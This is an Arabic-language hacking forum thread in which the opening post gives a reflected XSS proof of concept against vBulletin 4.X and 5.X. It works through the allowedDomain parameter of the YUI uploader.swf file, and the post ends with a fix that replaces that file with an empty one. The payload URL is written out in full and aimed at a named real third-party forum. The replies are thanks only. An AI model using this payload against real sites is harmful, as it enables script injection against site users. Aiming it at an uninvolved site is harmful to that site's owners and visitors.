1. أهلا وسهلاً بكم في :: IQ-TeaM FORUM :: .
    إذا كانت هذه الزيارة الأولى أو لديك الرغبة بالانضمام لأعضاء شبكة عراق تيم فيجب الاطلاع على خصوصية الشبكه فربما بقائك زائر افضل لك من الانضمام بحيث أن قوانين شبكة عراق تيم لا تتناسب مع اهتماماتك .
    • للأطلاع على الخصوصية وسياسة الاستخدام - التفاصيل
    • بعد الاطلاع على سياسة الموقع وقوانين شبكة عراق تيم يمكنك التسجيل معنا - تسجيل عضو جديد
    إستبعاد الملاحظة
الكاتب : Secuprog | المشاهدات : 914 | الردود : 7
  1. Secuprog Developer

    الأنتساب:
    ‏24 نوفمبر 2012
    المشاركات:
    37
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    20
    نظام التشغيل:
    windows 8
    [​IMG]

    بسم الله الرحمن الرحيم

    السلام عليكم ورحمة الله وبركاته

    ثغرة Xss تعمل على

    vBulletin 4.X and 5.X

    PoC:

    كود PHP:
    Site.com/clientscript/yui/uploader/assets/uploader.swf?allowedDomain=\%22}%29%29%29}catch%28e%29{alert%28document.domain%2 ​9;}//
    كود PHP:
    Site.com/clientscript/yui/uploader/assets/uploader.swf?allowedDomain=\%22}%29%29%29}catch%28e%29{alert%28document.domain%2 ​9;}//
    مثال على الثغره :

    كود PHP:
    www.quadsuk.net/forums/clientscript/yui/uploader/assets/uploader.swf?allowedDomain=\"})))}catch(e){alert(document.domain);}//
    [​IMG]

    ترقيع الثغرة

    لجميع نسخ الجيل الرابع :-

    ابحث عن الملف التالي وقم بحذفه ثم قم بإنشاء ملف فارغ بنفس الاسم


    كود PHP:
    /clientscript/yui/uploader/assets/uploader.swf


    لجميع نسخ الجيل الخامس :-

    ابحث عن الملف التالي وقم بحذفه ثم قم بإنشاء ملف فارغ بنفس الاسم

    كود PHP:
    /core/clientscript/yui/uploader/assets/uploader.swf
    [​IMG]
     
  2. DEaLeR_HaCKeR Developer

    الأنتساب:
    ‏27 ديسمبر 2011
    المشاركات:
    73
    الإعجابات المتلقاة:
    2
    نقاط الجائزة:
    30
    الإقامة:
    {مصر أرض الملوك}
    نظام التشغيل:
    Linux
    رد: ثغرة Xss تعمل على vBulletin 4.X and 5.X مع الترقيع

    مشكوور حبيبي بارك الله فيك :{y.}
     
  3. لعنة الهكرز Developer

    الأنتساب:
    ‏12 مارس 2013
    المشاركات:
    37
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    20
    رد: ثغرة Xss تعمل على vBulletin 4.X and 5.X مع الترقيع

    وعليكم السلام ورحمة الله وبركاته
    شكرا على طرح اخى الكريم
     
  4. ŦђĘ βě$Ţ Developer

    الأنتساب:
    ‏4 مارس 2013
    المشاركات:
    98
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    20
    رد: ثغرة Xss تعمل على vBulletin 4.X and 5.X مع الترقيع

    يعطيكَ ألف عافية يآلغـآلي !:"
     
  5. ~.O M A R.~ Developer

    الأنتساب:
    ‏16 يوليو 2012
    المشاركات:
    62
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    20
    الإقامة:
    الأردن
    رد: ثغرة Xss تعمل على vBulletin 4.X and 5.X مع الترقيع

    بارك الله فيك يا غالى

    مبدع يا غالى :{1}:
     
  6. فہٰايہٰروسہٰ موقوف لمخالفة الشروط

    الأنتساب:
    ‏25 أكتوبر 2015
    المشاركات:
    71
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    20
    نظام التشغيل:
    windows 8.1
    اللغة البرمجية:
    Perl
    رد: ثغرة Xss تعمل على vBulletin 4.X and 5.X مع الترقيع

    مشكور حبيبي{1!9}
     
  7. فہٰايہٰروسہٰ الہٰديہٰوانہ ExpErt DeveloPer

    الأنتساب:
    ‏27 يونيو 2015
    المشاركات:
    708
    الإعجابات المتلقاة:
    511
    نقاط الجائزة:
    215
    الجنس:
    ذكر
    الوظيفة:
    سايق مخده
    الإقامة:
    ربي يحفظك ياعراق
    نظام التشغيل:
    windows 8.1
    اللغة البرمجية:
    Perl
    Facebook:
    رد: ثغرة Xss تعمل على vBulletin 4.X and 5.X مع الترقيع

    الله يعطيك العافيه:ُ{1e}:ُ​
     
  8. !_عبدالله عباس_! DeveloPer Plus

    الأنتساب:
    ‏13 نوفمبر 2015
    المشاركات:
    420
    الإعجابات المتلقاة:
    381
    نقاط الجائزة:
    155
    نظام التشغيل:
    windows 8.1
    اللغة البرمجية:
    C#
    رد: ثغرة Xss تعمل على vBulletin 4.X and 5.X مع الترقيع

    عاشت الايادي يامبدع​


     

مشاركة هذه الصفحة